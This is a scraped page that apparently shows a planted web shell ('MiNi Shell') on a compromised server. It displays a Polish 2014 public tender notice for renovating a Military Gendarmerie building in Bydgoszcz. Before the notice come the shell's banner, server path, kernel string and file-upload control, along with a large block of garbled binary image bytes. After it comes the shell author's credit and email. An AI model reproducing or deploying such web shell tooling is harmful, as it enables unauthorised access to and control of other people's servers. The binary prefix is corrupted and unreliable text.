JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140618/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140618/205982-N-2014.html

<p class="kh_header"><b>Bydgoszcz: Remont pomieszczeń piwnicy, I i III piętra oraz klatki schodowej bud. nr 2 na terenie Oddziału Żandarmerii Wojskowej w Bydgoszczy</b><br>
<b>Numer ogłoszenia: 205982 - 2014; data zamieszczenia: 18.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd  Infrastruktury , ul. Podchorążych 33, 85-915 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052/3784285.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzi.hg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń piwnicy, I i III piętra oraz klatki schodowej bud. nr 2 na terenie Oddziału Żandarmerii Wojskowej w Bydgoszczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont pomieszczeń piwnicy, I i III piętra oraz klatki schodowej bud. nr 2 na terenie Oddziału Żandarmerii Wojskowej w Bydgoszczy.

Roboty remontowe obejmują:
ZAKRES ROBÓT BRANŻA BUDOWLANA
I.	Roboty przygotowawcze i  rozbiórkowe:
- prace zabezpieczające wydzielenie stref bezpiecznych,
- wykucie z muru ościeżnic stalowych i drewnianych, 
- zerwanie posadzki z tworzyw sztucznych, 
- demontaż stalowej obudowy grzejników, 
- rozebranie obicia ścian deskami oraz sufitu podwieszonego, 
- rozebranie posadzek oraz cokolików z płytek, 
- rozebranie ścianek gr. 12cm i 40cm, 
- wykucie otworów w ścianach z cegły, 
- obicie tynków wewnętrznych z zaprawy cementowo - wapiennej,
- rozebranie posadzki , progów oraz podkładu betonowego, 
- wykucie bruzd w ścianach z cegieł, 
- demontaż okien drewnianych,
- Wywóz i utylizacja materiałów porozbiórkowych.
II.	Roboty  murarskie:
- wykonanie ścianek działowych w sanitariacie,
- wykonanie nadproży drzwiowych z belek stalowych z dwuteownika NP 120 m 
wraz z poszerzeniem otworów drzwiowych,
- wykonanie przesklepień otworów w ścianach nośnych z cegieł: obsadzenie dwuteownika NP 220 / 2,50 m - 3 szt./1 otwór (z montażem ściągów stabilizacyjnych - np. pręty/śruby M-14) - 3 otwory (piwnica),
- szpałdowanie belek cegłą pełną , umocowanie siatki stalowej , oczkowanie i powlekanie jej zaprawą cementową,
- podmurówka wewnętrzna (podparapetowa) otworów okiennych - na wys. 1/2 c., 
- zamurowanie otworów drzwiowych i wnęk.
III.	Roboty  tynkarskie, wykonanie gładzi gipsowych, ścianek z płyt gipsowo-kartonowych i sufitów podwieszanych:
- wykonanie tynków uzupełniających na styku ściany z posadzką,
- uzupełnienie tynków cem-wap. kat. II i III na ścianach z cegieł,
- wykonanie tynków wewnętrznych kat. II,
- oczyszczenie tynków ze starej  farby i cząstek słabo związanych,
- zagruntowanie ścian i sufitów bezrozpuszczalnikowym środkiem głęboko gruntującym,
- wykonanie gładzi gipsowej jedno i dwuwarstwowej celem wyrównania nierówności na ścianach       i sufitach,
- wykonanie ścian i obudowa pionów kanalizacyjnych z płyt gipsowo - kartonowych,
- wykonanie sufitów podwieszanych systemowych, rastrowych o wym. rastrów 60/60.
IV.	Wykonanie wyprawy cienkowarstwowej z tynku mineralnego na ścianach korytarza:
- przygotowanie powierzchni starego tynku (zmycie, usunięcie luźnych warstw tynku, uzupełnienie ubytków),
- zagruntowanie powierzchni tynku preparatem gruntującym np. Atlas Uni-Grunt,
- wyrównanie ścian,
- nałożenie podkładowej masy tynkarskiej,
- wykonanie tynku mineralnego (np. Atlas Cermit DR),
- wykonanie tynku mozaikowego.
V.	Wykonanie izolacji przeciwwilgociowej pionowej i poziomej w sanitariatach.
VI.	Układanie płytek ceramicznych na podłogach, ścianach i schodach:
- pokrycie podłóg płytkami, które stanowią wierzchni element warstw podłogowych,
- pokrycie ścian płytkami, które stanowią warstwę ochronną i kształtującą formę architektoniczną okładanych elementów,
- pokrycie stopni schodowych, podestów, policzków biegu płytami granitowymi, które stanowią wierzchni element warstw podłogowych.
VII.	Roboty malarskie wewnętrzne:
- ługowanie farby (lamperia),
- przygotowanie podłoża,
- wykonanie powłok malarskich farbą: lateksową (korytarze - ściany), emulsyjną (całość sufitów pomieszczenia), olejną (lamperia o wys. 2,0 m - pomieszczenia ćwiczeń),
- malowanie krat okiennych.
VIII.	Roboty posadzkarskie:
- wykonanie wylewki z jastrychu cementowego zatartego np. Thomsit DA (lub inny równoważny) gr. 5-8 mm,
- wykonanie posadzki z wykładzin dwubarwnych z PCV Tarkett Optima, wykładzin obiektowych rulonowych z PCV, wykładzin dywanopodobnych wraz z cokołami oraz z paneli podłogowych płyty HDF.
IX.	Stolarka okienna i drzwiowa:
- wymiana stolarki okiennej,
- wymiana stolarki drzwiowej wewnętrznej i zewnętrznej,
- montaż parapetów wewnętrznych.
X.	Zabudowa, drzwi szklane, lustra:
- montaż zabudowy szklanej z automatycznym systemem suwanym,
- montaż drzwi szklonych z naświetleniem bocznym,
- montaż luster na ścianie.
ZAKRES ROBÓT BRANŻA SANITARNA 
XI.	Roboty w zakresie instalacji wodociągowej:
- demontaż zbędnej instalacji,
- wymiana wyeksploatowanych, zużytych odcinków istniejącej instalacji, zgodnie z przedmiarem,
- montaż armatury łazienkowej 
XII.	Roboty w zakresie instalacji kanalizacyjnej:
- demontaż zbędnej instalacji,
- wymiana wyeksploatowanych, zużytych odcinków istniejącej instalacji, zgodnie z przedmiarem,
- montaż przyborów sanitarnych.
XIII.	Roboty w zakresie instalacji centralnego ogrzewania:
- wymiana grzejników żeliwnych na stalowe płytowe PURMO, CosmoNova lub równoważne,
- montaż zaworów grzejnikowych z głowicą termostatyczną, całość zgodnie z przedmiarem,
- próby z dokonaniem regulacji instalacji c. o. 
XIV.	Wykonanie prób i badań szczelności oraz ciśnieniowych.
ZAKRES ROBÓT BRANŻA ELEKTRYCZNA
XV.	Roboty instalacyjno-montażowe:
- demontaż i montaż Rozdzielnicy Bezpiecznikowej,
- demontaż i montaż opraw oświetleniowych,
- demontaż i montaż osprzętu elektrycznego,
- montaż instalacji audio,
- montaż nowej instalacji elektrycznej,
- montaż ekranu elektrycznego,
- wykonanie prób i badań pomiarowych.
3) Szczegółowy zakres robót określają przedmiary robót, specyfikacja techniczna wykonania i odbioru robót, szkice i schematy pomieszczeń, stanowiące załączniki do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> w kwocie: 15.000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu w tym zakresie. Warunek oceniony zostanie na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wiedzy i doświadczenia  wykonawca musi wykazać  się wykonaniem w okresie  ostatnich 5 lat przed  upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jednej roboty budowlanej, polegającej na robotach remontowych wewnętrznych w czynnym obiekcie biurowym o wartości minimum 350.000 zł brutto
Warunek oceniony zostanie na podstawie oświadczenia oraz złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu w tym zakresie. Warunek oceniony zostanie na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunku wykonawca musi wykazać się dysponowaniem:
- osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, posiadającą poświadczenia bezpieczeństwa lub upoważnienia do dostępu do informacji niejawnych o klauzuli Zastrzeżone, a także zaświadczenia o przeszkoleniu w zakresie ochrony informacji niejawnych, oraz należącą do Izby Inżynierów Budownictwa;

- kierownikiem robót branży sanitarnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych, kanalizacyjnych i gazowych bez ograniczeń, posiadającą poświadczenia bezpieczeństwa lub upoważnienia do dostępu do informacji niejawnych o klauzuli Zastrzeżone, a także zaświadczenia o przeszkoleniu w zakresie ochrony informacji niejawnych, oraz należącą do Izby Inżynierów Budownictwa;

	W  celu potwierdzenia posiadania zdolności do ochrony informacji niejawnych, wszystkie osoby przewidziane do wykonania zamówienia muszą posiadać:
1) poświadczenia bezpieczeństwa lub upoważnienia uprawniające do dostępu do informacji niejawnych o klauzuli Zastrzeżone (zgodnie z art. 21 ust. 4 ustawy o ochronie informacji niejawnych)
2) przeszkolenie w zakresie ochrony informacji niejawnych

    - warunek oceniony zostanie na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu w tym zakresie. Warunek oceniony zostanie na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu
-warunek oceniony zostanie na podstawie złożonego oświadczenia i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wykaz osób, które będą uczestniczyć  w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (zał. nr 5 do formularza oferty)
2) Wskazanie osoby, która będzie pełnić funkcję kierownika budowy oraz kierownika robót wraz z informacjami na temat ich kwalifikacji zawodowych oraz informacją o podstawie do dysponowania tymi osobami (zał. nr 5); 
3) oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia i poświadczenia:
		- kierownik budowy - uprawnienia budowlane bez ograniczeń oraz przynależność do Polskiej Izby Inżynierów Budownictwa, poświadczenie bezpieczeństwa lub upoważnienie uprawniające do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE oraz przeszkolenie w zakresie ochrony informacji niejawnych;
	- kierownik robót branży sanitarnej- uprawnienia budowlane w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych, kanalizacyjnych i gazowych bez ograniczeń oraz przynależność do Polskiej Izby Inżynierów Budownictwa, poświadczenie bezpieczeństwa lub upoważnienie do dostępu do informacji niejawnych o klauzuli Zastrzeżone oraz zaświadczenie o przeszkoleniu w zakresie ochrony informacji niejawnych;
	- wszystkie osoby przewidziane do realizacji zamówienia - poświadczenia bezpieczeństwa lub upoważnienia uprawniające do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE oraz przeszkolenie w zakresie ochrony informacji niejawnych;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - skrócenie terminu realizacji - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany do umowy mogą być dokonywane za zgodą obu Stron wyrażoną na piśmie, pod rygorem nieważności, w formie  aneksu do niniejszej umowy jedynie w przypadku:
a)	zmiany wynagrodzenia:
- w przypadku urzędowej zmiany podatku VAT;
- w przypadku wyłączenia obiektów z użytkowania bądź przekazania ich w inny zarząd lub poza 
  wojsko;
- robót rozliczeniowych, wynikających z różnicy pomiędzy przedmiarami a faktyczną ilością 
wynikającą z obmiaru;
b)	zmiany numeru konta, adresu firmy - w przypadku poinformowania Zamawiającego pisemnie               o zaistniałej zmianie;
c)	zmiany osób funkcyjnych - kierownik budowy (po pisemnym poinformowaniu o zaistniałej zmianie), inspektor nadzoru;
d)	zmiany terminu wykonania przedmiotu umowy: 
- w przypadku realizacji robót zamiennych, dodatkowych;
- w przypadku udzielenia zamówienia dodatkowego na podstawie odrębnej umowy, którego wykonanie wpływa na zmianę terminu wykonania zamówienia podstawowego;
- jeżeli dochowanie terminu określonego w umowie jest niemożliwe z uwagi na siłę wyższą lub inne okoliczności niezależne od Wykonawcy, lub których Wykonawca przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć, jak również inne przeszkody lub utrudnienia w wykonywaniu przedmiotu umowy spowodowane przez osoby trzecie;
e)	wprowadzenia i zmiany podwykonawców - na zasadach określonych w § 10, jak również zmiany zakresu robót wykonywanych  za pomocą tych podwykonawców;
f)	zmiany aktów prawnych przytoczonych w niniejszej umowie;
g)	innych zmian, które nie są istotne w stosunku do oferty, na podstawie której dokonano wyboru Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzi.hg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> RZI Bydgoszcz, ul. Podchorążych 33, pok. nr 311.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2014 godzina 10:00, miejsce: siedziba Zamawiającego pok. nr 2- kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com